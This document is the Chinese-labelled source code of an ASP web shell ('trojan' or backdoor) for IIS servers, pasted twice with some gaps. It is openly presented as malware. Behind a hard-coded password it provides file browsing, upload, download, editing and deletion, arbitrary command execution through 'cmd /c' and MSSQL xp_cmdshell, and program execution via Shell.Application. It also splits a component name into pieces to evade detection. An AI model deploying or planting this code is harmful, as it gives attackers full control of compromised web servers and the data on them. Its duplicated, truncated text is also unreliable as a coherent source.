asp 木马源码
ASP木马代码
<%@ LANGUAGE = VBScript.Encode codepage ="936" %>
<%Server.ScriptTimeOut=5000%>
<%
'on error resume next
dim Data_5xsoft
Class upload_5xsoft
dim objForm,objFile,Version
Public function Form(strForm)
strForm=lcase(strForm)
if not objForm.exists(strForm) then
Form=""
else
Form=objForm(strForm)
end if
end function
Public function File(strFile)
strFile=lcase(strFile)
if not objFile.exists(strFile) then
set File=new FileInfo
else
set File=objFile(strFile)
end if
end function
Private Sub Class_Initialize
dim RequestData,sStart,vbCrlf,sInfo,iInfoStart,iInfoEnd,tStream,iStart,theFile
dim iFileSize,sFilePath,sFileType,sFormValue,sFileName
dim iFindStart,iFindEnd
dim iFormStart,iFormEnd,sFormName
Version="HTTP上传程序 Version 2.0"
set objForm=Server.CreateObject("Scripting.Dictionary")
set objFile=Server.CreateObject("Scripting.Dictionary")
if Request.TotalBytes<1 then Exit Sub
set tStream = Server.CreateObject("adodb.stream")
set Data_5xsoft = Server.CreateObject("adodb.stream")
Data_5xsoft.Type = 1
Data_5xsoft.Mode =3
Data_5xsoft.Open
Data_5xsoft.Write Request.BinaryRead(Request.TotalBytes)
Data_5xsoft.Position=0
RequestData =Data_5xsoft.Read
iFormStart = 1
iFormEnd = LenB(RequestData)
vbCrlf = chrB(13) & chrB(10)
sStart = MidB(RequestData,1, InStrB(iFormStart,RequestData,vbCrlf)-1)
iStart = LenB (sStart)
iFormStart=iFormStart+iStart+1
while (iFormStart + 10) < iFormEnd
iInfoEnd = InStrB(iFormStart,RequestData,vbCrlf & vbCrlf)+3
tStream.Type = 1
tStream.Mode =3
tStream.Open
Data_5xsoft.Position = iFormStart
Data_5xsoft.CopyTo tStream,iInfoEnd-iFormStart
tStream.Position = 0
tStream.Type = 2
tStream.Charset ="gb2312"
sInfo = tStream.ReadText
tStream.Close
iFormStart = InStrB(iInfoEnd,RequestData,sStart)
iFindStart = InStr(22,sInfo,"name=""",1)+6
iFindEnd = InStr(iFindStart,sInfo,"""",1)
sFormName = lcase(Mid (sinfo,iFindStart,iFindEnd-iFindStart))
if InStr (45,sInfo,"filename=""",1) > 0 then
set theFile=new FileInfo
iFindStart = InStr(iFindEnd,sInfo,"filename=""",1)+10
iFindEnd = InStr(iFindStart,sInfo,"""",1)
sFileName = Mid (sinfo,iFindStart,iFindEnd-iFindStart)
theFile.FileName=getFileName(sFileName)
theFile.FilePath=getFilePath(sFileName)
iFindStart = InStr(iFindEnd,sInfo,"Content-Type: ",1)+14
iFindEnd = InStr(iFindStart,sInfo,vbCr)
theFile.FileType =Mid (sinfo,iFindStart,iFindEnd-iFindStart)
theFile.FileStart =iInfoEnd
theFile.FileSize = iFormStart -iInfoEnd -3
theFile.FormName=sFormName
if not objFile.Exists(sFormName) then
objFile.add sFormName,theFile
end if
else
tStream.Type =1
tStream.Mode =3
tStream.Open
Data_5xsoft.Position = iInfoEnd
Data_5xsoft.CopyTo tStream,iFormStart-iInfoEnd-3
tStream.Position = 0
tStream.Type = 2
tStream.Charset ="gb2312"
sFormValue = tStream.ReadText
tStream.Close
if objForm.Exists(sFormName) then
objForm(sFormName)=objForm(sFormName)&", "&sFormValue
else
objForm.Add sFormName,sFormValue
end if
end if
iFormStart=iFormStart+iStart+1
wend
RequestData=""
set tStream =nothing
End Sub
Private Sub Class_Terminate
if Request.TotalBytes>0 then
objForm.RemoveAll
objFile.RemoveAll
set objForm=nothing
set objFile=nothing
Data_5xsoft.Close
set Data_5xsoft =nothing
end if
End Sub
Private function GetFilePath(FullPath)
If FullPath <> "" Then
GetFilePath = left(FullPath,InStrRev(FullPath, "\"))
Else
GetFilePath = ""
End If
End function
Private function GetFileName(FullPath)
If FullPath <> "" Then
GetFileName = mid(FullPath,InStrRev(FullPath, "\")+1)
Else
GetFileName = ""
End If
End function
End Class
Class FileInfo
dim FormName,FileName,FilePath,FileSize,FileType,FileStart
Private Sub Class_Initialize
FileName = ""
FilePath = ""
FileSize = 0
FileStart= 0
FormName = ""
FileType = ""
End Sub
Public function SaveAs(FullPath)
dim dr,ErrorChar,i
SaveAs=true
if trim(fullpath)="" or FileStart=0 or FileName="" or right(fullpath,1)="/" then exit function
set dr=CreateObject("Adodb.Stream")
dr.Mode=3
dr.Type=1
dr.Open
Data_5xsoft.position=FileStart
Data_5xsoft.copyto dr,FileSize
dr.SaveToFile FullPath,2
dr.Close
set dr=nothing
SaveAs=false
end function
End Class
httpt = Request.ServerVariables("server_name")
rseb=Request.ServerVariables("SCRIPT_NAME")
q=request("q")
if q="" then q=rseb
select case q
case rseb
if Epass(trim(request.form("password")))="q_ux888556" then
response.cookies("password")="7758521"
response.redirect rseb & "?q=list.asp"
else %>
<%=httpt%>
<%if request.form("password")<>"" then
response.write "Password Error!"
end if
%>
bordercolorlight="#000000" bordercolordark="#F2F2F9" cellspacing="0">
<%end if%>
<%case "down.asp"
call downloadFile(request("path"))
function downloadFile(strFile)
strFilename = strFile
Response.Buffer = True
Response.Clear
set s = Server.CreateObject("adodb.stream")
s.Open
s.Type = 1
if not oFileSys.FileExists(strFilename) then
Response.Write("
"
End Sub
%>
<%=httpt%>
bordercolordark="#FFFFFF" cellspacing="0">
<%else
response.write "Password Error!"
response.write "【返 回】"
end if
%>
<%case "edit.asp"%>
编辑源代码
<% '读文件
if Request.Cookies("password")="7758521" then
if request("op")="del" then
if Request("attrib")="true" then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
end if
Set thisfile = oFileSys.GetFile(whichfile)
thisfile.Delete True
Response.write ""
else
if request("op")="copy" then
if Request("attrib")="true" then
whichfile=Request("path")
dsfile=Request("dpath")
else
whichfile=server.mappath(Request("path"))
dsfile=Server.MapPath(Request("dpath"))
end if
Set thisfile = oFileSys.GetFile(whichfile)
thisfile.copy dsfile
%>
<%
else
if request.form("text")="" then
if Request("creat")<>"yes" then
if Request("attrib")="true" then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
end if
Set thisfile = oFileSys.OpenTextFile(whichfile, 1, False)
counter=0
thisline=thisfile.readall
thisfile.Close
set fs=nothing
end if
%>
<%else
if Request("attrib")="true" then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
end if
Set outfile=oFileSys.CreateTextFile(whichfile)
outfile.WriteLine Request("text")
outfile.close
set fs=nothing
Response.write ""
end if
end if
end if
else
response.write "Password Error!"
response.write "【返 回】"
end if
%>
<%case "edir.asp"%>
目录操作
<% '读文件
if Request.Cookies("password")="7758521" then
if request("op")="del" then
if Request("attrib")="true" then
whichdir=Request("path")
else
whichdir=server.mappath(Request("path"))
end if
oFileSys.DeleteFolder whichdir,True
Response.write ""
else
if request("op")="creat" then
if Request("attrib")="true" then
whichdir=Request("path")
else
whichdir=server.mappath(Request("path"))
end if
oFileSys.CreateFolder whichdir
Response.write ""
end if
end if
else
response.write "Password Error!"
response.write "【返 回】"
end if
%>
<%
case "upfile.asp"
if Request.Cookies("password")="7758521" then
set upload=new upload_5xSoft
if upload.form("filepath")="" then
HtmEnd "请输入要上传至的目录!"
set upload=nothing
response.end
else
formPath=upload.form("filepath")
if right(formPath,1)<>"/" then formPath=formPath&"/"
end if
iCount=0
for each formName in upload.objForm
set file=upload.file(formName)
if file.FileSize>0 then
file.SaveAs formPath & file.FileName
response.write file.FilePath&file.FileName&" ("&file.FileSize&") => "&formPath&File.FileName&" 成功!
"
iCount=iCount+1
end if
set file=nothing
next
set upload=nothing
Htmend iCount&" 个文件上传结束!"
sub HtmEnd(Msg)
set upload=nothing
Response.write "上传完毕!要刷新才能看到效果!ASP Shell
<%
On Error Resume Next
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
szTempFile = "C:\winnt\help\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<%
Response.Write request.form("sqlcmd") & "
"
Response.Write strResult
end if
case "test.asp"
Response.Buffer = False
Dim ObjTotest(26,4)
ObjTotest(0,0) = "MSWC.AdRotator"
ObjTotest(1,0) = "MSWC.BrowserType"
ObjTotest(2,0) = "MSWC.NextLink"
ObjTotest(3,0) = "MSWC.Tools"
ObjTotest(4,0) = "MSWC.Status"
ObjTotest(5,0) = "MSWC.Counters"
ObjTotest(6,0) = "IISSample.ContentRotator"
ObjTotest(7,0) = "IISSample.PageCounter"
ObjTotest(8,0) = "MSWC.PermissionChecker"
ObjTotest(9,0) = "Script"+"ing.File"+"Syst"+"emObject"
ObjTotest(9,1) = "(FSO 文本文件读写)"
ObjTotest(10,0) = "adodb.connection"
ObjTotest(10,1) = "(ADO 数据对象)"
ObjTotest(11,0) = "SoftArtisans.FileUp"
ObjTotest(11,1) = "(SA-FileUp 文件上传)"
ObjTotest(12,0) = "SoftArtisans.FileManager"
ObjTotest(12,1) = "(SoftArtisans 文件管理)"
ObjTotest(13,0) = "LyfUpload.UploadFile"
ObjTotest(13,1) = "(刘云峰的文件上传组件)"
ObjTotest(14,0) = "Persits.Upload.1"
ObjTotest(14,1) = "(ASPUpload 文件上传)"
ObjTotest(15,0) = "w3.upload"
ObjTotest(15,1) = "(Dimac 文件上传)"
ObjTotest(16,0) = "JMail.SmtpMail"
ObjTotest(16,1) = "(Dimac JMail 邮件收发)"
ObjTotest(17,0) = "CDONTS.NewMail"
ObjTotest(17,1) = "(虚拟 SMTP 发信)"
ObjTotest(18,0) = "Persits.MailSender"
ObjTotest(18,1) = "(ASPemail 发信)"
ObjTotest(19,0) = "SMTPsvg.Mailer"
ObjTotest(19,1) = "(ASPmail 发信)"
ObjTotest(20,0) = "DkQmail.Qmail"
ObjTotest(20,1) = "(dkQmail 发信)"
ObjTotest(21,0) = "Geocel.Mailer"
ObjTotest(21,1) = "(Geocel 发信)"
ObjTotest(22,0) = "IISmail.Iismail.1"
ObjTotest(22,1) = "(IISmail 发信)"
ObjTotest(23,0) = "SmtpMail.SmtpMail.1"
ObjTotest(23,1) = "(SmtpMail 发信)"
ObjTotest(24,0) = "SoftArtisans.ImageGen"
ObjTotest(24,1) = "(SA 的图像读写组件)"
ObjTotest(25,0) = "W3Image.Image"
ObjTotest(25,1) = "(Dimac 的图像读写组件)"
public IsObj,VerObj,TestObj
dim i
for i=0 to 25
on error resume next
IsObj=false
VerObj=""
'dim TestObj
TestObj=""
set TestObj=server.CreateObject(ObjTotest(i,0))
If -2147221005 <> Err then
IsObj = True
VerObj = TestObj.version
if VerObj="" or isnull(VerObj) then VerObj=TestObj.about
end if
ObjTotest(i,2)=IsObj
ObjTotest(i,3)=VerObj
next
sub ObjTest(strObj)
on error resume next
IsObj=false
VerObj=""
TestObj=""
set TestObj=server.CreateObject (strObj)
If -2147221005 <> Err then
IsObj = True
VerObj = TestObj.version
if VerObj="" or isnull(VerObj) then VerObj=TestObj.about
end if
End sub
%>
ASP探针V1.60-阿江http://www.ajiang.net
阿江改写的ASP探针-V1.60
是否支持ASP
出现以下情况即表示您的空间不支持ASP:
1、访问本文件时提示下载。
2、访问本文件时看到类似“<%@ Language="VBScript" %>”的文字。
服务器的有关参数
组件支持情况
<%
Dim strClass
strClass = Trim(Request.Form("classname"))
If "" <> strClass then
Response.Write "
您指定的组件的检查结果:"
Dim Verobj1
ObjTest(strClass)
If Not IsObj then
Response.Write "
很遗憾,该服务器不支持 " & strclass & " 组件!"
Else
if VerObj="" or isnull(VerObj) then
Verobj1="无法取得该组件版本"
Else
Verobj1="该组件版本是:" & VerObj
End If
Response.Write "
恭喜!该服务器支持 " & strclass & " 组件。" & verobj1 & ""
End If
Response.Write "
"
end if
%>
■ IIS自带的ASP组件
■ 常见的文件上传和管理组件
■ 常见的收发邮件组件
■ 图像处理组件
其他组件支持情况检测
在下面的输入框中输入你要检测的组件的ProgId或ClassId。
ASP脚本解释和运算速度测试
<%
'感谢网际同学录 http://www.5719.net 推荐使用timer函数
'因为只进行50万次计算,所以去掉了是否检测的选项而直接检测
Response.Write "整数运算测试,正在进行50万次加法运算..."
dim t1,t2,lsabc,thetime,thetime2
t1=timer
for i=1 to 500000
lsabc= 1 + 1
next
t2=timer
thetime=cstr(int(( (t2-t1)*10000 )+0.5)/10)
Response.Write "...已完成!" & thetime & "毫秒。
"
Response.Write "浮点运算测试,正在进行20万次开方运算..."
t1=timer
for i=1 to 200000
lsabc= 2^0.5
next
t2=timer
thetime2=cstr(int(( (t2-t1)*10000 )+0.5)/10)
Response.Write "...已完成!" & thetime2 & "毫秒。
"
%>
<%case "p.asp"%>
<%if Request.Cookies("password")="7758521" then %>
<%response.write "注意:每次只能执行一个操作" %>
当前时间:<%response.write now()%>
程序所在的物理路径:
<%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
asp.backdoor
<%
Response.Write request.form("cmd") & "
"
Response.Write strResult
DSnXA = Request.Form("text") '目录浏览
if (DSnXA <> "") then
set shell=server.createobject("shell.application") '建立shell对象
set fod1=shell.namespace(DSnXA)
set foditems=fod1.items
for each co in foditems
response.write "" & co.path & "-----" & co.size & "
"
next
end if
DSnXA1 = Request.Form("text1") '目录拷贝,不能进行文件拷贝
DSnXA2 = Request.Form("text2")
if DSnXA1<>"" and DSnXA2<>"" then
set shell1=server.createobject("shell.application") '建立shell对象
set fod1=shell1.namespace(DSnXA2)
for i=len(DSnXA1) to 1 step -1
if mid(DSnXA1,i,1)="\" then
path=left(DSnXA1,i-1)
exit for
end if
next
if len(path)=2 then path=path & "\"
path2=right(DSnXA1,len(DSnXA1)-i)
set fod2=shell1.namespace(path)
set foditem=fod2.parsename(path2)
fod1.copyhere foditem
response.write "command completed success!"
end if
DSnXA3 = Request.Form("text3") '目录移动
DSnXA4 = Request.Form("text4")
if DSnXA3<>"" and DSnXA4<>"" then
set shell2=server.createobject("shell.application") '建立shell对象
set fod1=shell2.namespace(DSnXA4)
for i=len(DSnXA3) to 1 step -1
if mid(DSnXA3,i,1)="\" then
path=left(DSnXA3,i-1)
exit for
end if
next
if len(path)=2 then path=path & "\"
path2=right(DSnXA3,len(DSnXA3)-i)
set fod2=shell2.namespace(path)
set foditem=fod2.parsename(path2)
fod1.movehere foditem
response.write "command completed success!"
end if
DSnXA5 = Request.Form("text5") '执行程序要指定路径
DSnXA6 = Request.Form("text6")
if DSnXA5<>"" and DSnXA6<>"" then
set shell3=server.createobject("shell.application") '建立shell对象
shell3.namespace(DSnXA5).items.item(DSnXA6).invokeverb
response.write "command completed success!"
end if
end if
%>
<%
end select
function Epass(pass)
temppass=StrReverse(left(pass&"zxcvbnm,./",10))
templen=len(pass)
mmpassword=""
for j=1 to 10
mmpassword=mmpassword+chr(asc(mid(temppass,j,1))-templen+int(j*1.1))
next
Epass=replace(mmpassword,"'","B")
end function
%>
<%@ LANGUAGE = VBScript.Encode codepage ="936" %>
<%Server.ScriptTimeOut=5000%>
<%
'on error resume next
dim Data_5xsoft
Class upload_5xsoft
dim objForm,objFile,Version
Public function Form(strForm)
strForm=lcase(strForm)
if not objForm.exists(strForm) then
Form=""
else
Form=objForm(strForm)
end if
end function
Public function File(strFile)
strFile=lcase(strFile)
if not objFile.exists(strFile) then
set File=new FileInfo
else
set File=objFile(strFile)
end if
end function
Private Sub Class_Initialize
dim RequestData,sStart,vbCrlf,sInfo,iInfoStart,iInfoEnd,tStream,iStart,theFile
dim iFileSize,sFilePath,sFileType,sFormValue,sFileName
dim iFindStart,iFindEnd
dim iFormStart,iFormEnd,sFormName
Version="HTTP上传程序 Version 2.0"
set objForm=Server.CreateObject("Scripting.Dictionary")
set objFile=Server.CreateObject("Scripting.Dictionary")
if Request.TotalBytes<1 then Exit Sub
set tStream = Server.CreateObject("adodb.stream")
set Data_5xsoft = Server.CreateObject("adodb.stream")
Data_5xsoft.Type = 1
Data_5xsoft.Mode =3
Data_5xsoft.Open
Data_5xsoft.Write Request.BinaryRead(Request.TotalBytes)
Data_5xsoft.Position=0
RequestData =Data_5xsoft.Read
iFormStart = 1
iFormEnd = LenB(RequestData)
vbCrlf = chrB(13) & chrB(10)
sStart = MidB(RequestData,1, InStrB(iFormStart,RequestData,vbCrlf)-1)
iStart = LenB (sStart)
iFormStart=iFormStart+iStart+1
while (iFormStart + 10) < iFormEnd
iInfoEnd = InStrB(iFormStart,RequestData,vbCrlf & vbCrlf)+3
tStream.Type = 1
tStream.Mode =3
tStream.Open
Data_5xsoft.Position = iFormStart
Data_5xsoft.CopyTo tStream,iInfoEnd-iFormStart
tStream.Position = 0
tStream.Type = 2
tStream.Charset ="gb2312"
sInfo = tStream.ReadText
tStream.Close
iFormStart = InStrB(iInfoEnd,RequestData,sStart)
iFindStart = InStr(22,sInfo,"name=""",1)+6
iFindEnd = InStr(iFindStart,sInfo,"""",1)
sFormName = lcase(Mid (sinfo,iFindStart,iFindEnd-iFindStart))
if InStr (45,sInfo,"filename=""",1) > 0 then
set theFile=new FileInfo
iFindStart = InStr(iFindEnd,sInfo,"filename=""",1)+10
iFindEnd = InStr(iFindStart,sInfo,"""",1)
sFileName = Mid (sinfo,iFindStart,iFindEnd-iFindStart)
theFile.FileName=getFileName(sFileName)
theFile.FilePath=getFilePath(sFileName)
iFindStart = InStr(iFindEnd,sInfo,"Content-Type: ",1)+14
iFindEnd = InStr(iFindStart,sInfo,vbCr)
theFile.FileType =Mid (sinfo,iFindStart,iFindEnd-iFindStart)
theFile.FileStart =iInfoEnd
theFile.FileSize = iFormStart -iInfoEnd -3
theFile.FormName=sFormName
if not objFile.Exists(sFormName) then
objFile.add sFormName,theFile
end if
else
tStream.Type =1
tStream.Mode =3
tStream.Open
Data_5xsoft.Position = iInfoEnd
Data_5xsoft.CopyTo tStream,iFormStart-iInfoEnd-3
tStream.Position = 0
tStream.Type = 2
tStream.Charset ="gb2312"
sFormValue = tStream.ReadText
tStream.Close
if objForm.Exists(sFormName) then
objForm(sFormName)=objForm(sFormName)&", "&sFormValue
else
objForm.Add sFormName,sFormValue
end if
end if
iFormStart=iFormStart+iStart+1
wend
RequestData=""
set tStream =nothing
End Sub
Private Sub Class_Terminate
if Request.TotalBytes>0 then
objForm.RemoveAll
objFile.RemoveAll
set objForm=nothing
set objFile=nothing
Data_5xsoft.Close
set Data_5xsoft =nothing
end if
End Sub
Private function GetFilePath(FullPath)
If FullPath <> "" Then
GetFilePath = left(FullPath,InStrRev(FullPath, "\"))
Else
GetFilePath = ""
End If
End function
Private function GetFileName(FullPath)
If FullPath <> "" Then
GetFileName = mid(FullPath,InStrRev(FullPath, "\")+1)
Else
GetFileName = ""
End If
End function
End Class
Class FileInfo
dim FormName,FileName,FilePath,FileSize,FileType,FileStart
Private Sub Class_Initialize
FileName = ""
FilePath = ""
FileSize = 0
FileStart= 0
FormName = ""
FileType = ""
End Sub
Public function SaveAs(FullPath)
dim dr,ErrorChar,i
SaveAs=true
if trim(fullpath)="" or FileStart=0 or FileName="" or right(fullpath,1)="/" then exit function
set dr=CreateObject("Adodb.Stream")
dr.Mode=3
dr.Type=1
dr.Open
Data_5xsoft.position=FileStart
Data_5xsoft.copyto dr,FileSize
dr.SaveToFile FullPath,2
dr.Close
set dr=nothing
SaveAs=false
end function
End Class
httpt = Request.ServerVariables("server_name")
rseb=Request.ServerVariables("SCRIPT_NAME")
q=request("q")
if q="" then q=rseb
select case q
case rseb
if Epass(trim(request.form("password")))="q_ux888556" then
response.cookies("password")="7758521"
response.redirect rseb & "?q=list.asp"
else %>
<%if request.form("password")<>"" then
response.write "Password Error!"
end if
%>
<%=httpt%> |
|
|
<%end if%>
<%case "down.asp"
call downloadFile(request("path"))
function downloadFile(strFile)
strFilename = strFile
Response.Buffer = True
Response.Clear
set s = Server.CreateObject("adodb.stream")
s.Open
s.Type = 1
if not oFileSys.FileExists(strFilename) then
Response.Write("
Error:
" & strFilename & " does not exist")
Response.End
end if
Set f = oFileSys.GetFile(strFilename)
intFilelength = f.size
s.LoadFromFile(strFilename)
if err then
Response.Write("
Error:
" & err.Description & "")
Response.End
end if
Response.AddHeader "Content-Disposition", "attachment; filename=" & f.name
Response.AddHeader "Content-Length", intFilelength
Response.CharSet = "UTF-8"
Response.ContentType = "application/octet-stream"
Response.BinaryWrite s.Read
Response.Flush
s.Close
Set s = Nothing
response.end
End Function
%>
<%case "list.asp"%>
<%
urlpath=server.urlencode(path)
if Request.Cookies("password")="7758521" then
dim cpath,lpath
if Request("path")="" then
lpath="/"
else
lpath=Request("path")&"/"
end if
if Request("attrib")="true" then
cpath=lpath
attrib="true"
else
cpath=Server.MapPath(lpath)
attrib=""
end if
Sub GetFolder()
dim theFolder,theSubFolders
if oFileSys.FolderExists(cpath)then
Set theFolder=oFileSys.GetFolder(cpath)
Set theSubFolders=theFolder.SubFolders
Response.write"■↑回上级目录
<%
end if
End Sub
Sub GetFile()
dim theFiles
if oFileSys.FolderExists(cpath)then
Set theFolder=oFileSys.GetFolder(cpath)
Set theFiles=theFolder.Files
Response.write"
End Sub
%>
color="#FFFFFF"><%=httpt%> |
|
| ※换盘:style="background-color: rgb(255,255,255);color:rgb(255,0,0)"><%
For Each thing in oFileSys.Drives Response.write ":"&thing.DriveLetter&":" NEXT %> 地址: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %> |
|
| ※<%
if Request("attrib")="true" then response.write "切到相对路径" else response.write "切到绝对路径" end if %> ※绝对:style="background-color: rgb(255,255,255)"><%=cpath%> |
|
| ※当前1:<%=lpath%> | |
| <%Call GetFolder()%>
|
<%Call GetFile()%>
|
<%else
response.write "Password Error!"
response.write "【返 回】"
end if
%>
<%case "edit.asp"%>
<% '读文件
if Request.Cookies("password")="7758521" then
if request("op")="del" then
if Request("attrib")="true" then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
end if
Set thisfile = oFileSys.GetFile(whichfile)
thisfile.Delete True
Response.write ""
else
if request("op")="copy" then
if Request("attrib")="true" then
whichfile=Request("path")
dsfile=Request("dpath")
else
whichfile=server.mappath(Request("path"))
dsfile=Server.MapPath(Request("dpath"))
end if
Set thisfile = oFileSys.GetFile(whichfile)
thisfile.copy dsfile
%>
<%
else
if request.form("text")="" then
if Request("creat")<>"yes" then
if Request("attrib")="true" then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
end if
Set thisfile = oFileSys.OpenTextFile(whichfile, 1, False)
counter=0
thisline=thisfile.readall
thisfile.Close
set fs=nothing
end if
%>
<%else
if Request("attrib")="true" then
whichfile=Request("path")
else
whichfile=server.mappath(Request("path"))
end if
Set outfile=oFileSys.CreateTextFile(whichfile)
outfile.WriteLine Request("text")
outfile.close
set fs=nothing
Response.write ""
end if
end if
end if
else
response.write "Password Error!"
response.write "【返 回】"
end if
%>
<%case "edir.asp"%>
<% '读文件
if Request.Cookies("password")="7758521" then
if request("op")="del" then
if Request("attrib")="true" then
whichdir=Request("path")
else
whichdir=server.mappath(Request("path"))
end if
oFileSys.DeleteFolder whichdir,True
Response.write ""
else
if request("op")="creat" then
if Request("attrib")="true" then
whichdir=Request("path")
else
whichdir=server.mappath(Request("path"))
end if
oFileSys.CreateFolder whichdir
Response.write ""
end if
end if
else
response.write "Password Error!"
response.write "【返 回】"
end if
%>
<%
case "upfile.asp"
if Request.Cookies("password")="7758521" then
set upload=new upload_5xSoft
if upload.form("filepath")="" then
HtmEnd "请输入要上传至的目录!"
set upload=nothing
response.end
else
formPath=upload.form("filepath")
if right(formPath,1)<>"/" then formPath=formPath&"/"
end if
iCount=0
for each formName in upload.objForm
set file=upload.file(formName)
if file.FileSize>0 then
file.SaveAs formPath & file.FileName
response.write file.FilePath&file.FileName&" ("&file.FileSize&") => "&formPath&File.FileName&" 成功!
"
iCount=iCount+1
end if
set file=nothing
next
set upload=nothing
Htmend iCount&" 个文件上传结束!"
sub HtmEnd(Msg)
set upload=nothing
Response.write "上传完毕!要刷新才能看到效果!
"
response.end
end sub
else
response.write "Password Error!"
response.write "【返 回】"
end if
case "cmd.asp"
if Request.Cookies("password")<>"7758521" then
response.write "Password Error!"
response.write "【返 回】"
else%>
<%
On Error Resume Next
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
szTempFile = "C:\winnt\help\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<%
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
<%end if
case "sql.asp"
if Request.Cookies("password")<>"7758521" then
response.write "Password Error!"
response.write "【返 回】"
else
If trim(request.form("sqlcmd"))<>"" Then
password= trim(Request.form("pa"))
id=trim(Request.form("id"))
SqlLocalName=trim(Request.form("SqlLocalName"))
if SqlLocalName="" or SqlLocalName="mssql服务器地址" then SqlLocalName="127.0.0.1"
set adoConn=Server.CreateObject("ADODB.Connection")
adoConn.Open "Provider=SQLOLEDB.1;Password="&password&";User ID="&id&";Data Source ="&SqlLocalName
strQuery = "exec master.dbo.xp_cmdshell '" & request.form("sqlcmd") & "'"
set recResult = adoConn.Execute(strQuery)
If NOT recResult.EOF Then
Do While NOT recResult.EOF
strResult = strResult & chr(13) & recResult(0)
recResult.MoveNext
Loop
End if
set recResult = Nothing
strResult = Replace(strResult," "," ")
strResult = Replace(strResult,"<","<")
strResult = Replace(strResult,">",">")
strResult = Replace(strResult,chr(13),"
")
End if
set adoConn = Nothing
%>
<%
Response.Write request.form("sqlcmd") & "
"
Response.Write strResult
end if
case "test.asp"
Response.Buffer = False
Dim ObjTotest(26,4)
ObjTotest(0,0) = "MSWC.AdRotator"
ObjTotest(1,0) = "MSWC.BrowserType"
ObjTotest(2,0) = "MSWC.NextLink"
ObjTotest(3,0) = "MSWC.Tools"
ObjTotest(4,0) = "MSWC.Status"
ObjTotest(5,0) = "MSWC.Counters"
ObjTotest(6,0) = "IISSample.ContentRotator"
ObjTotest(7,0) = "IISSample.PageCounter"
ObjTotest(8,0) = "MSWC.PermissionChecker"
ObjTotest(9,0) = "Script"+"ing.File"+"Syst"+"emObject"
ObjTotest(9,1) = "(FSO 文本文件读写)"
ObjTotest(10,0) = "adodb.connection"
ObjTotest(10,1) = "(ADO 数据对象)"
ObjTotest(11,0) = "SoftArtisans.FileUp"
ObjTotest(11,1) = "(SA-FileUp 文件上传)"
ObjTotest(12,0) = "SoftArtisans.FileManager"
ObjTotest(12,1) = "(SoftArtisans 文件管理)"
ObjTotest(13,0) = "LyfUpload.UploadFile"
ObjTotest(13,1) = "(刘云峰的文件上传组件)"
ObjTotest(14,0) = "Persits.Upload.1"
ObjTotest(14,1) = "(ASPUpload 文件上传)"
ObjTotest(15,0) = "w3.upload"
ObjTotest(15,1) = "(Dimac 文件上传)"
ObjTotest(16,0) = "JMail.SmtpMail"
ObjTotest(16,1) = "(Dimac JMail 邮件收发)"
ObjTotest(17,0) = "CDONTS.NewMail"
ObjTotest(17,1) = "(虚拟 SMTP 发信)"
ObjTotest(18,0) = "Persits.MailSender"
ObjTotest(18,1) = "(ASPemail 发信)"
ObjTotest(19,0) = "SMTPsvg.Mailer"
ObjTotest(19,1) = "(ASPmail 发信)"
ObjTotest(20,0) = "DkQmail.Qmail"
ObjTotest(20,1) = "(dkQmail 发信)"
ObjTotest(21,0) = "Geocel.Mailer"
ObjTotest(21,1) = "(Geocel 发信)"
ObjTotest(22,0) = "IISmail.Iismail.1"
ObjTotest(22,1) = "(IISmail 发信)"
ObjTotest(23,0) = "SmtpMail.SmtpMail.1"
ObjTotest(23,1) = "(SmtpMail 发信)"
ObjTotest(24,0) = "SoftArtisans.ImageGen"
ObjTotest(24,1) = "(SA 的图像读写组件)"
ObjTotest(25,0) = "W3Image.Image"
ObjTotest(25,1) = "(Dimac 的图像读写组件)"
public IsObj,VerObj,TestObj
dim i
for i=0 to 25
on error resume next
IsObj=false
VerObj=""
'dim TestObj
TestObj=""
set TestObj=server.CreateObject(ObjTotest(i,0))
If -2147221005 <> Err then
IsObj = True
VerObj = TestObj.version
if VerObj="" or isnull(VerObj) then VerObj=TestObj.about
end if
ObjTotest(i,2)=IsObj
ObjTotest(i,3)=VerObj
next
sub ObjTest(strObj)
on error resume next
IsObj=false
VerObj=""
TestObj=""
set TestObj=server.CreateObject (strObj)
If -2147221005 <> Err then
IsObj = True
VerObj = TestObj.version
if VerObj="" or isnull(VerObj) then VerObj=TestObj.about
end if
End sub
%>
阿江改写的ASP探针-V1.60
是否支持ASP
出现以下情况即表示您的空间不支持ASP:
1、访问本文件时提示下载。
2、访问本文件时看到类似“<%@ Language="VBScript" %>”的文字。
服务器的有关参数
|
组件支持情况
<%
Dim strClass
strClass = Trim(Request.Form("classname"))
If "" <> strClass then
Response.Write "
您指定的组件的检查结果:"
Dim Verobj1
ObjTest(strClass)
If Not IsObj then
Response.Write "
很遗憾,该服务器不支持 " & strclass & " 组件!"
Else
if VerObj="" or isnull(VerObj) then
Verobj1="无法取得该组件版本"
Else
Verobj1="该组件版本是:" & VerObj
End If
Response.Write "
恭喜!该服务器支持 " & strclass & " 组件。" & verobj1 & ""
End If
Response.Write "
"
end if
%>
■ IIS自带的ASP组件
| 组 件 名 称 | 支持及版本 |
| <%=ObjTotest(i,0) & " " & ObjTotest(i,1)%> | <%
If Not ObjTotest(i,2) Then Response.Write "×" Else Response.Write "√ " & left(ObjTotest(i,3),11) & "" End If%> |
■ 常见的文件上传和管理组件
| 组 件 名 称 | 支持及版本 |
| <%=ObjTotest(i,0) & " " & ObjTotest(i,1)%> | <%
If Not ObjTotest(i,2) Then Response.Write "×" Else Response.Write "√ " & left(ObjTotest(i,3),11) & "" End If%> |
■ 常见的收发邮件组件
| 组 件 名 称 | 支持及版本 |
